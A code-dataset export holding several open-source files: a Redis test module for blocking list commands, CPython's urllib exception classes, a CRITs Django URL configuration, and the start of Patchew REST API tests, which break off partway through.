code stringlengths 1 25.8M | language stringclasses 18 values | source stringclasses 4 values | repo stringclasses 78 values | path stringlengths 0 268 |
|---|---|---|---|---|
#include "redismodule.h"
#include <string.h>
#include <strings.h>
#include <assert.h>
#include <unistd.h>
#define UNUSED(V) ((void) V)
#define LIST_SIZE 1024
/* The FSL (Fixed-Size List) data type is a low-budget imitation of the
* native Redis list, in order to test list-like commands implemented
* by a module.
* Examples: FSL.PUSH, FSL.BPOP, etc. */
typedef struct {
long long list[LIST_SIZE];
long long length;
} fsl_t; /* Fixed-size list */
static RedisModuleType *fsltype = NULL;
fsl_t *fsl_type_create(void) {
fsl_t *o;
o = RedisModule_Alloc(sizeof(*o));
o->length = 0;
return o;
}
void fsl_type_free(fsl_t *o) {
RedisModule_Free(o);
}
/* ========================== "fsltype" type methods ======================= */
void *fsl_rdb_load(RedisModuleIO *rdb, int encver) {
if (encver != 0) {
return NULL;
}
fsl_t *fsl = fsl_type_create();
fsl->length = RedisModule_LoadUnsigned(rdb);
for (long long i = 0; i < fsl->length; i++)
fsl->list[i] = RedisModule_LoadSigned(rdb);
return fsl;
}
void fsl_rdb_save(RedisModuleIO *rdb, void *value) {
fsl_t *fsl = value;
RedisModule_SaveUnsigned(rdb,fsl->length);
for (long long i = 0; i < fsl->length; i++)
RedisModule_SaveSigned(rdb, fsl->list[i]);
}
void fsl_aofrw(RedisModuleIO *aof, RedisModuleString *key, void *value) {
fsl_t *fsl = value;
for (long long i = 0; i < fsl->length; i++)
RedisModule_EmitAOF(aof, "FSL.PUSH","sl", key, fsl->list[i]);
}
void fsl_free(void *value) {
fsl_type_free(value);
}
/* ========================== helper methods ======================= */
/* Wrapper to the boilerplate code of opening a key, checking its type, etc.
* Returns 0 if `keyname` exists in the dataset, but it's of the wrong type (i.e. not FSL) */
int get_fsl(RedisModuleCtx *ctx, RedisModuleString *keyname, int mode, int create, fsl_t **fsl, int reply_on_failure) {
*fsl = NULL;
RedisModuleKey *key = RedisModule_OpenKey(ctx, keyname, mode);
if (RedisModule_KeyType(key) != REDISMODULE_KEYTYPE_EMPTY) {
/* Key exists */
if (RedisModule_ModuleTypeGetType(key) != fsltype) {
/* Key is not FSL */
RedisModule_CloseKey(key);
if (reply_on_failure)
RedisModule_ReplyWithError(ctx, REDISMODULE_ERRORMSG_WRONGTYPE);
RedisModuleCallReply *reply = RedisModule_Call(ctx, "INCR", "c", "fsl_wrong_type");
RedisModule_FreeCallReply(reply);
return 0;
}
*fsl = RedisModule_ModuleTypeGetValue(key);
if (*fsl && !(*fsl)->length && mode & REDISMODULE_WRITE) {
/* Key exists, but it's logically empty */
if (create) {
create = 0; /* No need to create, key exists in its basic state */
} else {
RedisModule_DeleteKey(key);
*fsl = NULL;
}
} else {
/* Key exists, and has elements in it - no need to create anything */
create = 0;
}
}
if (create) {
*fsl = fsl_type_create();
RedisModule_ModuleTypeSetValue(key, fsltype, *fsl);
}
RedisModule_CloseKey(key);
return 1;
}
/* ========================== commands ======================= */
/* FSL.PUSH <key> <int> - Push an integer to the fixed-size list (to the right).
* It must be greater than the element in the head of the list. */
int fsl_push(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) {
if (argc != 3)
return RedisModule_WrongArity(ctx);
long long ele;
if (RedisModule_StringToLongLong(argv[2],&ele) != REDISMODULE_OK)
return RedisModule_ReplyWithError(ctx,"ERR invalid integer");
fsl_t *fsl;
if (!get_fsl(ctx, argv[1], REDISMODULE_WRITE, 1, &fsl, 1))
return REDISMODULE_OK;
if (fsl->length == LIST_SIZE)
return RedisModule_ReplyWithError(ctx,"ERR list is full");
if (fsl->length != 0 && fsl->list[fsl->length-1] >= ele)
return RedisModule_ReplyWithError(ctx,"ERR new element has to be greater than the head element");
fsl->list[fsl->length++] = ele;
RedisModule_SignalKeyAsReady(ctx, argv[1]);
RedisModule_ReplicateVerbatim(ctx);
return RedisModule_ReplyWithSimpleString(ctx, "OK");
}
typedef struct {
RedisModuleString *keyname;
long long ele;
} timer_data_t;
static void timer_callback(RedisModuleCtx *ctx, void *data)
{
timer_data_t *td = data;
fsl_t *fsl;
if (!get_fsl(ctx, td->keyname, REDISMODULE_WRITE, 1, &fsl, 1))
return;
if (fsl->length == LIST_SIZE)
return; /* list is full */
if (fsl->length != 0 && fsl->list[fsl->length-1] >= td->ele)
return; /* new element has to be greater than the head element */
fsl->list[fsl->length++] = td->ele;
RedisModule_SignalKeyAsReady(ctx, td->keyname);
RedisModule_Replicate(ctx, "FSL.PUSH", "sl", td->keyname, td->ele);
RedisModule_FreeString(ctx, td->keyname);
RedisModule_Free(td);
}
/* FSL.PUSHTIMER <key> <int> <period-in-ms> - Push the number 9000 to the fixed-size list (to the right).
* It must be greater than the element in the head of the list. */
int fsl_pushtimer(RedisModuleCtx *ctx, RedisModuleString **argv, int argc)
{
if (argc != 4)
return RedisModule_WrongArity(ctx);
long long ele;
if (RedisModule_StringToLongLong(argv[2],&ele) != REDISMODULE_OK)
return RedisModule_ReplyWithError(ctx,"ERR invalid integer");
long long period;
if (RedisModule_StringToLongLong(argv[3],&period) != REDISMODULE_OK)
return RedisModule_ReplyWithError(ctx,"ERR invalid period");
fsl_t *fsl;
if (!get_fsl(ctx, argv[1], REDISMODULE_WRITE, 1, &fsl, 1))
return REDISMODULE_OK;
if (fsl->length == LIST_SIZE)
return RedisModule_ReplyWithError(ctx,"ERR list is full");
timer_data_t *td = RedisModule_Alloc(sizeof(*td));
td->keyname = argv[1];
RedisModule_RetainString(ctx, td->keyname);
td->ele = ele;
RedisModuleTimerID id = RedisModule_CreateTimer(ctx, period, timer_callback, td);
RedisModule_ReplyWithLongLong(ctx, id);
return REDISMODULE_OK;
}
int bpop_reply_callback(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) {
REDISMODULE_NOT_USED(argv);
REDISMODULE_NOT_USED(argc);
RedisModuleString *keyname = RedisModule_GetBlockedClientReadyKey(ctx);
fsl_t *fsl;
if (!get_fsl(ctx, keyname, REDISMODULE_WRITE, 0, &fsl, 0) || !fsl)
return REDISMODULE_ERR;
RedisModule_Assert(fsl->length);
RedisModule_ReplyWithLongLong(ctx, fsl->list[--fsl->length]);
/* I'm lazy so i'll replicate a potentially blocking command, it shouldn't block in this flow. */
RedisModule_ReplicateVerbatim(ctx);
return REDISMODULE_OK;
}
int bpop_timeout_callback(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) {
REDISMODULE_NOT_USED(argv);
REDISMODULE_NOT_USED(argc);
return RedisModule_ReplyWithSimpleString(ctx, "Request timedout");
}
/* FSL.BPOP <key> <timeout> [NO_TO_CB]- Block clients until list has two or more elements.
* When that happens, unblock client and pop the last two elements (from the right). */
int fsl_bpop(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) {
if (argc < 3)
return RedisModule_WrongArity(ctx);
long long timeout;
if (RedisModule_StringToLongLong(argv[2],&timeout) != REDISMODULE_OK || timeout < 0)
return RedisModule_ReplyWithError(ctx,"ERR invalid timeout");
int to_cb = 1;
if (argc == 4) {
if (strcasecmp("NO_TO_CB", RedisModule_StringPtrLen(argv[3], NULL)))
return RedisModule_ReplyWithError(ctx,"ERR invalid argument");
to_cb = 0;
}
fsl_t *fsl;
if (!get_fsl(ctx, argv[1], REDISMODULE_WRITE, 0, &fsl, 1))
return REDISMODULE_OK;
if (!fsl) {
RedisModule_BlockClientOnKeys(ctx, bpop_reply_callback, to_cb ? bpop_timeout_callback : NULL,
NULL, timeout, &argv[1], 1, NULL);
} else {
RedisModule_Assert(fsl->length);
RedisModule_ReplyWithLongLong(ctx, fsl->list[--fsl->length]);
/* I'm lazy so i'll replicate a potentially blocking command, it shouldn't block in this flow. */
RedisModule_ReplicateVerbatim(ctx);
}
return REDISMODULE_OK;
}
int bpopgt_reply_callback(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) {
REDISMODULE_NOT_USED(argv);
REDISMODULE_NOT_USED(argc);
RedisModuleString *keyname = RedisModule_GetBlockedClientReadyKey(ctx);
long long *pgt = RedisModule_GetBlockedClientPrivateData(ctx);
fsl_t *fsl;
if (!get_fsl(ctx, keyname, REDISMODULE_WRITE, 0, &fsl, 0) || !fsl)
return RedisModule_ReplyWithError(ctx,"UNBLOCKED key no longer exists");
if (fsl->list[fsl->length-1] <= *pgt)
return REDISMODULE_ERR;
RedisModule_Assert(fsl->length);
RedisModule_ReplyWithLongLong(ctx, fsl->list[--fsl->length]);
/* I'm lazy so i'll replicate a potentially blocking command, it shouldn't block in this flow. */
RedisModule_ReplicateVerbatim(ctx);
return REDISMODULE_OK;
}
int bpopgt_timeout_callback(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) {
REDISMODULE_NOT_USED(argv);
REDISMODULE_NOT_USED(argc);
return RedisModule_ReplyWithSimpleString(ctx, "Request timedout");
}
void bpopgt_free_privdata(RedisModuleCtx *ctx, void *privdata) {
REDISMODULE_NOT_USED(ctx);
RedisModule_Free(privdata);
}
/* FSL.BPOPGT <key> <gt> <timeout> - Block clients until list has an element greater than <gt>.
* When that happens, unblock client and pop the last element (from the right). */
int fsl_bpopgt(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) {
if (argc != 4)
return RedisModule_WrongArity(ctx);
long long gt;
if (RedisModule_StringToLongLong(argv[2],>) != REDISMODULE_OK)
return RedisModule_ReplyWithError(ctx,"ERR invalid integer");
long long timeout;
if (RedisModule_StringToLongLong(argv[3],&timeout) != REDISMODULE_OK || timeout < 0)
return RedisModule_ReplyWithError(ctx,"ERR invalid timeout");
fsl_t *fsl;
if (!get_fsl(ctx, argv[1], REDISMODULE_WRITE, 0, &fsl, 1))
return REDISMODULE_OK;
if (!fsl)
return RedisModule_ReplyWithError(ctx,"ERR key must exist");
if (fsl->list[fsl->length-1] <= gt) {
/* We use malloc so the tests in blockedonkeys.tcl can check for memory leaks */
long long *pgt = RedisModule_Alloc(sizeof(long long));
*pgt = gt;
RedisModule_BlockClientOnKeysWithFlags(
ctx, bpopgt_reply_callback, bpopgt_timeout_callback,
bpopgt_free_privdata, timeout, &argv[1], 1, pgt,
REDISMODULE_BLOCK_UNBLOCK_DELETED);
} else {
RedisModule_Assert(fsl->length);
RedisModule_ReplyWithLongLong(ctx, fsl->list[--fsl->length]);
/* I'm lazy so i'll replicate a potentially blocking command, it shouldn't block in this flow. */
RedisModule_ReplicateVerbatim(ctx);
}
return REDISMODULE_OK;
}
int bpoppush_reply_callback(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) {
REDISMODULE_NOT_USED(argv);
REDISMODULE_NOT_USED(argc);
RedisModuleString *src_keyname = RedisModule_GetBlockedClientReadyKey(ctx);
RedisModuleString *dst_keyname = RedisModule_GetBlockedClientPrivateData(ctx);
fsl_t *src;
if (!get_fsl(ctx, src_keyname, REDISMODULE_WRITE, 0, &src, 0) || !src)
return REDISMODULE_ERR;
fsl_t *dst;
if (!get_fsl(ctx, dst_keyname, REDISMODULE_WRITE, 1, &dst, 0) || !dst)
return REDISMODULE_ERR;
RedisModule_Assert(src->length);
long long ele = src->list[--src->length];
dst->list[dst->length++] = ele;
RedisModule_SignalKeyAsReady(ctx, dst_keyname);
/* I'm lazy so i'll replicate a potentially blocking command, it shouldn't block in this flow. */
RedisModule_ReplicateVerbatim(ctx);
return RedisModule_ReplyWithLongLong(ctx, ele);
}
int bpoppush_timeout_callback(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) {
REDISMODULE_NOT_USED(argv);
REDISMODULE_NOT_USED(argc);
return RedisModule_ReplyWithSimpleString(ctx, "Request timedout");
}
void bpoppush_free_privdata(RedisModuleCtx *ctx, void *privdata) {
RedisModule_FreeString(ctx, privdata);
}
/* FSL.BPOPPUSH <src> <dst> <timeout> - Block clients until <src> has an element.
* When that happens, unblock client, pop the last element from <src> and push it to <dst>
* (from the right). */
int fsl_bpoppush(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) {
if (argc != 4)
return RedisModule_WrongArity(ctx);
long long timeout;
if (RedisModule_StringToLongLong(argv[3],&timeout) != REDISMODULE_OK || timeout < 0)
return RedisModule_ReplyWithError(ctx,"ERR invalid timeout");
fsl_t *src;
if (!get_fsl(ctx, argv[1], REDISMODULE_WRITE, 0, &src, 1))
return REDISMODULE_OK;
if (!src) {
/* Retain string for reply callback */
RedisModule_RetainString(ctx, argv[2]);
/* Key is empty, we must block */
RedisModule_BlockClientOnKeys(ctx, bpoppush_reply_callback, bpoppush_timeout_callback,
bpoppush_free_privdata, timeout, &argv[1], 1, argv[2]);
} else {
fsl_t *dst;
if (!get_fsl(ctx, argv[2], REDISMODULE_WRITE, 1, &dst, 1))
return REDISMODULE_OK;
RedisModule_Assert(src->length);
long long ele = src->list[--src->length];
dst->list[dst->length++] = ele;
RedisModule_SignalKeyAsReady(ctx, argv[2]);
RedisModule_ReplyWithLongLong(ctx, ele);
/* I'm lazy so i'll replicate a potentially blocking command, it shouldn't block in this flow. */
RedisModule_ReplicateVerbatim(ctx);
}
return REDISMODULE_OK;
}
/* FSL.GETALL <key> - Reply with an array containing all elements. */
int fsl_getall(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) {
if (argc != 2)
return RedisModule_WrongArity(ctx);
fsl_t *fsl;
if (!get_fsl(ctx, argv[1], REDISMODULE_READ, 0, &fsl, 1))
return REDISMODULE_OK;
if (!fsl)
return RedisModule_ReplyWithArray(ctx, 0);
RedisModule_ReplyWithArray(ctx, fsl->length);
for (int i = 0; i < fsl->length; i++)
RedisModule_ReplyWithLongLong(ctx, fsl->list[i]);
return REDISMODULE_OK;
}
/* Callback for blockonkeys_popall */
int blockonkeys_popall_reply_callback(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) {
REDISMODULE_NOT_USED(argc);
RedisModuleKey *key = RedisModule_OpenKey(ctx, argv[1], REDISMODULE_WRITE);
if (RedisModule_KeyType(key) == REDISMODULE_KEYTYPE_LIST) {
RedisModuleString *elem;
long len = 0;
RedisModule_ReplyWithArray(ctx, REDISMODULE_POSTPONED_ARRAY_LEN);
while ((elem = RedisModule_ListPop(key, REDISMODULE_LIST_HEAD)) != NULL) {
len++;
RedisModule_ReplyWithString(ctx, elem);
RedisModule_FreeString(ctx, elem);
}
/* I'm lazy so i'll replicate a potentially blocking command, it shouldn't block in this flow. */
RedisModule_ReplicateVerbatim(ctx);
RedisModule_ReplySetArrayLength(ctx, len);
} else {
RedisModule_ReplyWithError(ctx, "ERR Not a list");
}
RedisModule_CloseKey(key);
return REDISMODULE_OK;
}
int blockonkeys_popall_timeout_callback(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) {
REDISMODULE_NOT_USED(argv);
REDISMODULE_NOT_USED(argc);
return RedisModule_ReplyWithError(ctx, "ERR Timeout");
}
/* BLOCKONKEYS.POPALL key
*
* Blocks on an empty key for up to 3 seconds. When unblocked by a list
* operation like LPUSH, all the elements are popped and returned. Fails with an
* error on timeout. */
int blockonkeys_popall(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) {
if (argc != 2)
return RedisModule_WrongArity(ctx);
RedisModuleKey *key = RedisModule_OpenKey(ctx, argv[1], REDISMODULE_READ);
if (RedisModule_KeyType(key) == REDISMODULE_KEYTYPE_EMPTY) {
RedisModule_BlockClientOnKeys(ctx, blockonkeys_popall_reply_callback,
blockonkeys_popall_timeout_callback,
NULL, 3000, &argv[1], 1, NULL);
} else {
RedisModule_ReplyWithError(ctx, "ERR Key not empty");
}
RedisModule_CloseKey(key);
return REDISMODULE_OK;
}
/* BLOCKONKEYS.LPUSH key val [val ..]
* BLOCKONKEYS.LPUSH_UNBLOCK key val [val ..]
*
* A module equivalent of LPUSH. If the name LPUSH_UNBLOCK is used,
* RM_SignalKeyAsReady() is also called. */
int blockonkeys_lpush(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) {
if (argc < 3)
return RedisModule_WrongArity(ctx);
RedisModuleKey *key = RedisModule_OpenKey(ctx, argv[1], REDISMODULE_WRITE);
if (RedisModule_KeyType(key) != REDISMODULE_KEYTYPE_EMPTY &&
RedisModule_KeyType(key) != REDISMODULE_KEYTYPE_LIST) {
RedisModule_ReplyWithError(ctx, REDISMODULE_ERRORMSG_WRONGTYPE);
} else {
for (int i = 2; i < argc; i++) {
if (RedisModule_ListPush(key, REDISMODULE_LIST_HEAD,
argv[i]) != REDISMODULE_OK) {
RedisModule_CloseKey(key);
return RedisModule_ReplyWithError(ctx, "ERR Push failed");
}
}
}
RedisModule_CloseKey(key);
/* signal key as ready if the command is lpush_unblock */
size_t len;
const char *str = RedisModule_StringPtrLen(argv[0], &len);
if (!strncasecmp(str, "blockonkeys.lpush_unblock", len)) {
RedisModule_SignalKeyAsReady(ctx, argv[1]);
}
RedisModule_ReplicateVerbatim(ctx);
return RedisModule_ReplyWithSimpleString(ctx, "OK");
}
/* Callback for the BLOCKONKEYS.BLPOPN command */
int blockonkeys_blpopn_reply_callback(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) {
REDISMODULE_NOT_USED(argc);
long long n;
RedisModule_StringToLongLong(argv[2], &n);
RedisModuleKey *key = RedisModule_OpenKey(ctx, argv[1], REDISMODULE_WRITE);
int result;
if (RedisModule_KeyType(key) == REDISMODULE_KEYTYPE_LIST &&
RedisModule_ValueLength(key) >= (size_t)n) {
RedisModule_ReplyWithArray(ctx, n);
for (long i = 0; i < n; i++) {
RedisModuleString *elem = RedisModule_ListPop(key, REDISMODULE_LIST_HEAD);
RedisModule_ReplyWithString(ctx, elem);
RedisModule_FreeString(ctx, elem);
}
/* I'm lazy so i'll replicate a potentially blocking command, it shouldn't block in this flow. */
RedisModule_ReplicateVerbatim(ctx);
result = REDISMODULE_OK;
} else if (RedisModule_KeyType(key) == REDISMODULE_KEYTYPE_LIST ||
RedisModule_KeyType(key) == REDISMODULE_KEYTYPE_EMPTY) {
const char *module_cmd = RedisModule_StringPtrLen(argv[0], NULL);
if (!strcasecmp(module_cmd, "blockonkeys.blpopn_or_unblock"))
RedisModule_UnblockClient(RedisModule_GetBlockedClientHandle(ctx), NULL);
/* continue blocking */
result = REDISMODULE_ERR;
} else {
result = RedisModule_ReplyWithError(ctx, REDISMODULE_ERRORMSG_WRONGTYPE);
}
RedisModule_CloseKey(key);
return result;
}
int blockonkeys_blpopn_timeout_callback(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) {
REDISMODULE_NOT_USED(argv);
REDISMODULE_NOT_USED(argc);
return RedisModule_ReplyWithError(ctx, "ERR Timeout");
}
int blockonkeys_blpopn_abort_callback(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) {
REDISMODULE_NOT_USED(argv);
REDISMODULE_NOT_USED(argc);
return RedisModule_ReplyWithSimpleString(ctx, "Action aborted");
}
/* BLOCKONKEYS.BLPOPN key N
*
* Blocks until key has N elements and then pops them or fails after 3 seconds.
*/
int blockonkeys_blpopn(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) {
if (argc < 3) return RedisModule_WrongArity(ctx);
long long n, timeout = 3000LL;
if (RedisModule_StringToLongLong(argv[2], &n) != REDISMODULE_OK) {
return RedisModule_ReplyWithError(ctx, "ERR Invalid N");
}
if (argc > 3 ) {
if (RedisModule_StringToLongLong(argv[3], &timeout) != REDISMODULE_OK) {
return RedisModule_ReplyWithError(ctx, "ERR Invalid timeout value");
}
}
RedisModuleKey *key = RedisModule_OpenKey(ctx, argv[1], REDISMODULE_WRITE);
int keytype = RedisModule_KeyType(key);
if (keytype != REDISMODULE_KEYTYPE_EMPTY &&
keytype != REDISMODULE_KEYTYPE_LIST) {
RedisModule_ReplyWithError(ctx, REDISMODULE_ERRORMSG_WRONGTYPE);
} else if (keytype == REDISMODULE_KEYTYPE_LIST &&
RedisModule_ValueLength(key) >= (size_t)n) {
RedisModule_ReplyWithArray(ctx, n);
for (long i = 0; i < n; i++) {
RedisModuleString *elem = RedisModule_ListPop(key, REDISMODULE_LIST_HEAD);
RedisModule_ReplyWithString(ctx, elem);
RedisModule_FreeString(ctx, elem);
}
/* I'm lazy so i'll replicate a potentially blocking command, it shouldn't block in this flow. */
RedisModule_ReplicateVerbatim(ctx);
} else {
RedisModule_BlockClientOnKeys(ctx, blockonkeys_blpopn_reply_callback,
timeout ? blockonkeys_blpopn_timeout_callback : blockonkeys_blpopn_abort_callback,
NULL, timeout, &argv[1], 1, NULL);
}
RedisModule_CloseKey(key);
return REDISMODULE_OK;
}
int RedisModule_OnLoad(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) {
REDISMODULE_NOT_USED(argv);
REDISMODULE_NOT_USED(argc);
if (RedisModule_Init(ctx, "blockonkeys", 1, REDISMODULE_APIVER_1)== REDISMODULE_ERR)
return REDISMODULE_ERR;
RedisModuleTypeMethods tm = {
.version = REDISMODULE_TYPE_METHOD_VERSION,
.rdb_load = fsl_rdb_load,
.rdb_save = fsl_rdb_save,
.aof_rewrite = fsl_aofrw,
.mem_usage = NULL,
.free = fsl_free,
.digest = NULL,
};
fsltype = RedisModule_CreateDataType(ctx, "fsltype_t", 0, &tm);
if (fsltype == NULL)
return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx,"fsl.push",fsl_push,"write",1,1,1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx,"fsl.pushtimer",fsl_pushtimer,"write",1,1,1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx,"fsl.bpop",fsl_bpop,"write",1,1,1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx,"fsl.bpopgt",fsl_bpopgt,"write",1,1,1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx,"fsl.bpoppush",fsl_bpoppush,"write",1,2,1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx,"fsl.getall",fsl_getall,"",1,1,1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx, "blockonkeys.popall", blockonkeys_popall,
"write", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx, "blockonkeys.lpush", blockonkeys_lpush,
"write", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx, "blockonkeys.lpush_unblock", blockonkeys_lpush,
"write", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx, "blockonkeys.blpopn", blockonkeys_blpopn,
"write", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx, "blockonkeys.blpopn_or_unblock", blockonkeys_blpopn,
"write", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
return REDISMODULE_OK;
} | c | github | https://github.com/redis/redis | tests/modules/blockonkeys.c |
"""Exception classes raised by urllib.
The base exception class is URLError, which inherits from OSError. It
doesn't define any behavior of its own, but is the base class for all
exceptions defined in this package.
HTTPError is an exception class that is also a valid HTTP response
instance. It behaves this way because HTTP protocol errors are valid
responses, with a status code, headers, and a body. In some contexts,
an application may want to handle an exception like a regular
response.
"""
import io
import urllib.response
__all__ = ['URLError', 'HTTPError', 'ContentTooShortError']
class URLError(OSError):
# URLError is a sub-type of OSError, but it doesn't share any of
# the implementation. It overrides __init__ and __str__.
# It sets self.args for compatibility with other OSError
# subclasses, but args doesn't have the typical format with errno in
# slot 0 and strerror in slot 1. This may be better than nothing.
def __init__(self, reason, filename=None):
self.args = reason,
self.reason = reason
if filename is not None:
self.filename = filename
def __str__(self):
return '<urlopen error %s>' % self.reason
class HTTPError(URLError, urllib.response.addinfourl):
"""Raised when HTTP error occurs, but also acts like non-error return"""
__super_init = urllib.response.addinfourl.__init__
def __init__(self, url, code, msg, hdrs, fp):
self.code = code
self.msg = msg
self.hdrs = hdrs
self.fp = fp
self.filename = url
if fp is None:
fp = io.BytesIO()
self.__super_init(fp, hdrs, url, code)
def __str__(self):
return 'HTTP Error %s: %s' % (self.code, self.msg)
def __repr__(self):
return '<HTTPError %s: %r>' % (self.code, self.msg)
# since URLError specifies a .reason attribute, HTTPError should also
# provide this attribute. See issue13211 for discussion.
@property
def reason(self):
return self.msg
@property
def headers(self):
return self.hdrs
@headers.setter
def headers(self, headers):
self.hdrs = headers
class ContentTooShortError(URLError):
"""Exception raised when downloaded size does not match content-length."""
def __init__(self, message, content):
URLError.__init__(self, message)
self.content = content | python | github | https://github.com/python/cpython | Lib/urllib/error.py |
from django.conf.urls import patterns
urlpatterns = patterns('crits.raw_data.views',
(r'^details/(?P<_id>\w+)/$', 'raw_data_details'),
(r'^details_by_link/(?P<link>.+)/$', 'details_by_link'),
(r'^get_inline_comments/(?P<_id>\w+)/$', 'get_inline_comments'),
(r'^get_versions/(?P<_id>\w+)/$', 'get_raw_data_versions'),
(r'^set_tool_details/(?P<_id>\w+)/$', 'set_raw_data_tool_details'),
(r'^set_tool_name/(?P<_id>\w+)/$', 'set_raw_data_tool_name'),
(r'^set_raw_data_type/(?P<_id>\w+)/$', 'set_raw_data_type'),
(r'^set_raw_data_highlight_comment/(?P<_id>\w+)/$', 'set_raw_data_highlight_comment'),
(r'^set_raw_data_highlight_date/(?P<_id>\w+)/$', 'set_raw_data_highlight_date'),
(r'^add_inline_comment/(?P<_id>\w+)/$', 'add_inline_comment'),
(r'^add_highlight/(?P<_id>\w+)/$', 'add_highlight'),
(r'^remove_highlight/(?P<_id>\w+)/$', 'remove_highlight'),
(r'^upload/(?P<link_id>.+)/$', 'upload_raw_data'),
(r'^upload/$', 'upload_raw_data'),
(r'^remove/(?P<_id>[\S ]+)$', 'remove_raw_data'),
(r'^list/$', 'raw_data_listing'),
(r'^list/(?P<option>\S+)/$', 'raw_data_listing'),
(r'^add_data_type/$', 'new_raw_data_type'),
(r'^get_data_types/$', 'get_raw_data_type_dropdown'),
) | unknown | codeparrot/codeparrot-clean | ||
#!/usr/bin/env python3
#
# Copyright 2018 Red Hat, Inc.
#
# Authors:
# Paolo Bonzini <pbonzini@redhat.com>
#
# This work is licensed under the MIT License. Please see the LICENSE file or
# http://opensource.org/licenses/MIT.
from collections import OrderedDict
import json
from django.contrib.auth.models import User
from api.models import Message
from api.rest import AddressSerializer
from .patchewtest import PatchewTestCase, main
try:
import coreapi
except ImportError:
coreapi = None
class RestTest(PatchewTestCase):
def setUp(self):
self.create_superuser()
self.p = self.add_project("QEMU", "qemu-devel@nongnu.org")
self.PROJECT_BASE = "%sprojects/%d/" % (self.REST_BASE, self.p.id)
self.sp = self.add_project("QEMU Block Layer", "qemu-block@nongnu.org")
self.sp.parent_project = self.p
self.sp.prefix_tags = "block"
self.sp.save()
self.SUBPROJECT_BASE = "%sprojects/%d/" % (self.REST_BASE, self.sp.id)
self.p2 = self.add_project("EDK 2", "edk2-devel@lists.01.org")
self.PROJECT_BASE_2 = "%sprojects/%d/" % (self.REST_BASE, self.p2.id)
self.admin = User.objects.get(username="admin")
self.USER_BASE = "%susers/%d/" % (self.REST_BASE, self.admin.id)
def test_root(self):
resp = self.api_client.get(self.REST_BASE)
self.assertEquals(resp.data["users"], self.REST_BASE + "users/")
self.assertEquals(resp.data["projects"], self.REST_BASE + "projects/")
self.assertEquals(resp.data["series"], self.REST_BASE + "series/")
resp = self.api_client.get(self.REST_BASE, HTTP_HOST="patchew.org")
self.assertEquals(resp.data["users"], "http://patchew.org/api/v1/users/")
self.assertEquals(resp.data["projects"], "http://patchew.org/api/v1/projects/")
self.assertEquals(resp.data["series"], "http://patchew.org/api/v1/series/")
def test_users(self):
resp = self.api_client.get(self.REST_BASE + "users/")
self.assertEquals(resp.data["count"], 1)
self.assertEquals(resp.data["results"][0]["resource_uri"], self.USER_BASE)
self.assertEquals(resp.data["results"][0]["username"], self.admin.username)
def test_user(self):
resp = self.api_client.get(self.USER_BASE)
self.assertEquals(resp.data["resource_uri"], self.USER_BASE)
self.assertEquals(resp.data["username"], self.admin.username)
def test_projects(self):
resp = self.api_client.get(self.REST_BASE + "projects/")
self.assertEquals(resp.data["count"], 3)
self.assertEquals(resp.data["results"][0]["resource_uri"], self.PROJECT_BASE)
self.assertEquals(resp.data["results"][0]["name"], "QEMU")
self.assertEquals(
resp.data["results"][0]["mailing_list"], "qemu-devel@nongnu.org"
)
self.assertEquals(resp.data["results"][1]["resource_uri"], self.SUBPROJECT_BASE)
self.assertEquals(resp.data["results"][1]["name"], "QEMU Block Layer")
self.assertEquals(
resp.data["results"][1]["mailing_list"], "qemu-block@nongnu.org"
)
self.assertEquals(resp.data["results"][1]["parent_project"], self.PROJECT_BASE)
def test_project(self):
resp = self.api_client.get(self.PROJECT_BASE)
self.assertEquals(resp.data["resource_uri"], self.PROJECT_BASE)
self.assertEquals(resp.data["name"], "QEMU")
self.assertEquals(resp.data["mailing_list"], "qemu-devel@nongnu.org")
resp = self.api_client.get(self.SUBPROJECT_BASE)
self.assertEquals(resp.data["resource_uri"], self.SUBPROJECT_BASE)
self.assertEquals(resp.data["name"], "QEMU Block Layer")
self.assertEquals(resp.data["mailing_list"], "qemu-block@nongnu.org")
self.assertEquals(resp.data["parent_project"], self.PROJECT_BASE)
def test_project_by_name(self):
resp = self.api_client.get(self.REST_BASE + "projects/by-name/QEMU/")
self.assertEquals(resp.status_code, 307)
resp = self.api_client.get(resp["Location"])
self.assertEquals(resp.data["resource_uri"], self.PROJECT_BASE)
self.assertEquals(resp.data["name"], "QEMU")
self.assertEquals(resp.data["mailing_list"], "qemu-devel@nongnu.org")
resp = self.api_client.get(
self.REST_BASE + "projects/by-name/QEMU/?some=thing&foo=bar"
)
self.assertEquals(resp.status_code, 307)
self.assertIn("some=thing", resp["Location"])
